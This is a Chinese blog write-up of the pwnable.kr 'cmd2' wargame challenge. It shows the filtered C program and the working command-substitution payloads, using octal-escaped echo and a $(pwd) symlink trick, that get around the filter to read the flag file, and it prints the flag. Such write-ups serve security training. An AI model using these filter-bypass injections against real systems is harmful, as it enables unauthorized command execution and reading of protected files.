pwnable.kr [Toddler's Bottle] - cmd2

最新推荐文章于 2020-01-10 20:16:47 发布
最新推荐文章于 2020-01-10 20:16:47 发布
阅读量542 收藏
点赞数
分类专栏: UNIX/Linux pwnable 文章标签: pwn Linux编程 env echo CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19550513/article/details/65441662
版权

Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission…
but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

承接上题,参数过滤的内容增加了 “/” ,使得我们不能简单地通过 /bin/cat 来执行shell 。所以这里的关键是怎么样构造一个可以不含任何被过滤内容的字串,并且可以在命令执行时被解析出来。

先放上 cmd2.c 源码:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "=")!=0;
    r += strstr(cmd, "PATH")!=0;
    r += strstr(cmd, "export")!=0;
    r += strstr(cmd, "/")!=0;
    r += strstr(cmd, "`")!=0;
    r += strstr(cmd, "flag")!=0;
    return r;
}

extern char** environ;
void delete_env(){
    char** p;
    for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
    delete_env();
    putenv("PATH=/no_command_execution_until_you_become_a_hacker");
    if(filter(argv[1])) return 0;
    printf("%s\n", argv[1]);
    system( argv[1] );
    return 0;
}

笔者一开始的思路是通过 python 构造参数输入,其中命令 /bin/cat flag 先转成十六进制字符串:

from pwn import *

cmd = "/bin/cat flag"
print "\\" + "\\".join(hex(c) for c in ordlist(cmd))

再通过python传值并解析。但是由于输入时的引号限制,所以在 /tmp 目录下新建了一个自己的目录,写了一段代码尝试:


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


int main()
{
    printf("input:\n");
    char *argv[3] = {0};
    argv[0] = "/home/cmd2/cmd2";
    argv[1] = "$(python -c 'print \"\\x2f\\x62\\x69\\x6e\\x2f\\x63\\x61\\x74\\x20\\x66\\x6c\\x61\\x67\"')";
    execve("/home/cmd2/cmd2", argv, NULL);
    return 0;
}

这样构造的参数可以通过验证,但是还存在一个限制:

input:
$(python -c 'print "\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67"')
sh: 1: python: not found

因为 putenv("PATH=/no_command_execution_until_you_become_a_hacker"); 这一语句的关系,导致 python 无法被解析,所以这个思路基本上是走不通了 :(

转而想到echo,但这里 sh 并不认可 -e :(

sh: 1: -e: not found

(echo 命令不通过参数 e 也可以解析出 16 进制 和 8 进制的字串,不过不同 echo 版本会对这个功能有所限制,像笔者虚拟机 Ubuntu 16.04 的 echo 就无法解析,只有 echo -e 才能解析特殊字符),现在服务器上测试 echo 能否直接解析出 16 进制字符串:

$ echo "\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67"
\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67

看来并不行,再尝试 8 进制字串,先用 python 跑出 8 进制字串:

from pwn import *

cmd = "/bin/cat flag"
print "\\" + "\\".join(oct(c) for c in ordlist(cmd))

到 remote host 去尝试:

$ echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147"
/bin/cat flag

似乎看到了成功的希望,接下来只要 echo 被 sh “认可”就行了。
更改后的程序代码如下:


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


int main()
{
    printf("input:\n");
    char *argv[3] = {0};
    argv[0] = "/home/cmd2/cmd2";
    argv[1] = "$(echo \"\\057\\0142\\0151\\0156\\057\\0143\\0141\\0164\\040\\0146\\0154\\0141\\0147\")";
    execve("/home/cmd2/cmd2", argv, NULL);
    return 0;
}

这里还要注意当前是位于 /tmp 下的子目录,需要先 ln -s /home/cmd2/flag flag ,为 flag 文件添加一个软链接,之后编译运行:

input:
$(echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147")
FuN_w1th_5h3ll_v4riabl3s_haha

Done.

其实这里在 /home/cmd2 目录下

$ ./cmd2 '$(echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147")'

直接运行也是一样的,不存在字符串多个引号的问题了。

另外在看别人的 writeup 时发现了一种“骚套路”:
http://blog.csdn.net/hwz2311245/article/details/50555295

首先在/tmp目录下建立自己的目录exploit,然后创建目录/tmp/exploit/c。那么,如果在/tmp/exploit/c目录下执行pwd命令就可以得到/tmp/exploit/c了。然后在/tmp/exploit下构造cat的软应用ln -s /bin/cat cat,在/tmp/exploit/c下建立flag的软引用ln -s /home/cmd2/flag flag。然后在/tmp/exploit/c下执行命令/home/cmd2/cmd2 “$(pwd)at f*”就可以得到flag了。其原理就是利用“$(pwd)at”构造出/tmp/exploit/cat命令。

$ ln -s /bin/cat cat
$ mkdir c
$ cd c
$ ln -s /home/cmd2/flag flag
$ /home/cmd2/cmd2 "\$(pwd)at f*"
$(pwd)at f*
FuN_w1th_5h3ll_v4riabl3s_haha
Umiade
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Toddler-care-website:使用 Django 的互联网编程实验室迷你项目
08-04
2. **项目结构**:Django项目有一个标准的目录结构,包括`manage.py`命令行工具、`settings.py`配置文件、`urls.py`路由文件以及应用目录。在这个项目中,可能会有一个名为`toddler_care`的应用,包含了模型、视图、...
Toddler Tap-开源
07-20
2. **Logo.png** - 这是 Toddler Tap 的应用图标,用于识别和展示软件的品牌形象。图标通常是吸引用户的第一印象,对于幼儿软件来说,设计应该简洁明快,容易理解,符合目标用户的审美。 3. **Documents** - 这个...
pwnable.krcmd2
子曰小玖的博客
06-05 183
https://www.cnblogs.com/p4nda/p/7147552.html 这道题是上一个cmd1的升级版 ssh cmd2@pwnable.kr -p2222 (pw:mommy now I get what PATH environmentis for :)) 登录之后,还是审计一下源代码: #include <stdio.h> #include &lt...
pwnable.kr---cmd2
leeham的博客
11-08 453
pwnable.krcmd2解题思路同cmd1的writeup一样,一步一步解析问题:delete_env();此行清除了所有的环境变量;因此想在执行cmd2之前设置环境变量并利用变量绕过filter,那么这一步就是一个阻碍。另外要注意的是,extern char ** environ中environ是一个系统已经定义的变量,在此声明后即可使用,它的作用是指向环境变量。if(filter(argv
pwnable.krcmd2
bluestar628的博客
04-12 1847
#include #include int filter(char* cmd){ intr=0; r+= strstr(cmd, "=")!=0; r+= strstr(cmd, "PATH")!=0; r+= strstr(cmd, "export")!=0; r+= strstr(cmd, "
Pwnable.kr学习之cmd2
neuisf的博客
01-10 130
此题考察内容: linux下(command)的使用,可以用于将command执行的结果作为命令交给shell执行。如:(command)的使用,可以用于将command执行的结果作为命令交给shell执行。 如:(command)的使用,可以用于将command执行的结果作为命令交给shell执行。如:(pwd) 的效果为致性’/’,这不是命令故,报错。再如:当前目录为根目录/,此时 $(pwd...
pwnable.kr第二遍---lotto blackjack
leeham的博客
03-16 340
&gt;&gt;&gt;&gt;&gt;lotto尽管没有退出程序,用户可以一直玩下去但是每次要重新打开/dev/random取随机数这里的随机数是每次更新的所以......1.每次的/dev/urandom的数字是变化的根据linux下的系统熵产生的随机数2.第二次做,显然不如第一次那样有对题目的敬畏之心,没能好好看代码&gt;首先从main函数开始读,了解整个函数的逻辑以及攻击点,函数主要包括...
A Toddler Game-开源
05-26
至于“Toddler-windows”这个文件,很可能是游戏的Windows版本安装包或者执行文件。这意味着开发者已经为Windows用户提供了一个方便的执行版本,无需在Windows环境中自行编译源代码,简化了用户的使用流程。 总的来...
Kids Key - Alphabet Training for Toddler-开源
04-28
"Kids Key - Alphabet Training for Toddler" 是一款专为1至4岁孩子设计的开源软件,旨在通过字母和色彩的互动游戏,帮助孩子们轻松学习ABC和颜色识别,同时也为他们初步接触数字概念提供了趣味性的平台。...
toddler-ng:下一代Toddler,一款精心设计的可用便携式微内核操作系统
03-05
幼儿下一代幼儿主要目标用C99编写带有设备树支持的所有体系结构的统一启动协议,与x86上的ACPI和PPC / SPARC上的OFW相结合支持更多架构(ARM,PowerPC,x86,RISC-V,Alpha,SPARC,m68k)和机器(例如,多个ARM板)...
pwnable.kr [Toddler's Bottle] - blackjack
Re:Umiade.tr
03-21 334
Hey! check out this C implementation of blackjack game! I found it online * http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html I like to give my flags to milli
pwnable 笔记 Toddler's Bottle - blackjack
HiTaQini
11-11 602
代码审计
pwnable.kr第二遍---uaf cmd1 cmd2
leeham的博客
03-16 409
&gt;&gt;&gt;&gt;uafC++程序逆向gdb-peda看对方服务器上虚表的地址x/3gx 0x11caca0???通过虚表的index来完成函数调用是非常有可能?还是一定会???找到虚函数表??地址的格式\xuse after free:当一个内存块被释放之后再次被使用,下边这些情况:1.内存被释放后,其对应的指针被设置为NULL,然后再次使用,程序会崩溃2.内存块被释放后,其对应的...
Pwnable之[Toddler's Bottle](三)--asm
杀生丸?不,其实我要的是桔梗
03-30 263
Pwnable之[Toddler’s Bottle](三)–ASM 提示:我觉得一个黑客应该知道怎么做shellcode 查看代码asm.c的代码 #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sec...
pwnable.kr解题write up —— Toddler's Bottle(二)
逆水行舟
01-21 4553
网站地址:pwnable.kr 提供许多优质的ctf训练题,题目设计的都非常巧妙,适合思考。
pwnable.kr [Rookiss] - [simple login]
Re:Umiade.tr
03-23 1348
Can you get authentication from this server? Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 Rookiss 初体验就从相对熟悉的逆向这一块开始好了。下载好文件后发现是 elf 64 ,在虚拟机上简单跑一跑,要求输入一个 Authenticat
pwnable.kr [Toddler's Bottle] - input
Re:Umiade.tr
03-13 1213
这题流程相对较长,考查Linux编程的基本功(笔者做到这题不禁感叹自己基本功还是欠了不少火候)。 在一开始,尝试写Python脚本去完成验证,但stage 2关于stdio的验证却苦无思路。 这里感谢werew在他的writeup中提供的解决思路,这才豁然开朗。 参考链接:https://werewblog.wordpress.com/2016/01/11/pwnable-kr-input/关
pwnable.kr [Toddler's Bottle] - codemap
Re:Umiade.tr
06-02 1064
写在最前:想要成为安全大牛的愿望还是这么遥不可及。 渐渐地,没有什么忧虑的大学生活也好像开始有了一些属于小人物的忐忑。 还是坚信自己很厉害,可是道路前方仍是一篇迷蒙。感谢帮助过我的前辈,以及让我可以暂时不考虑经济压力的父母。 I have a binary that has a lot information inside heap. How fast can you reverse-
pwnable.kr [Toddler's Bottle] - coin1
Re:Umiade.tr
03-17 962
Mommy, I wanna play a game! (if your network response time is too slow, try nc 0 9007 inside pwnable.kr server) Running at : nc pwnable.kr 9007 游戏规则如下: --------------------------------------
字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转为java数组
最新发布
12-07
以下是将字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转换为Java数组的代码示例: ```java String[] strArr = {"Baby",...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值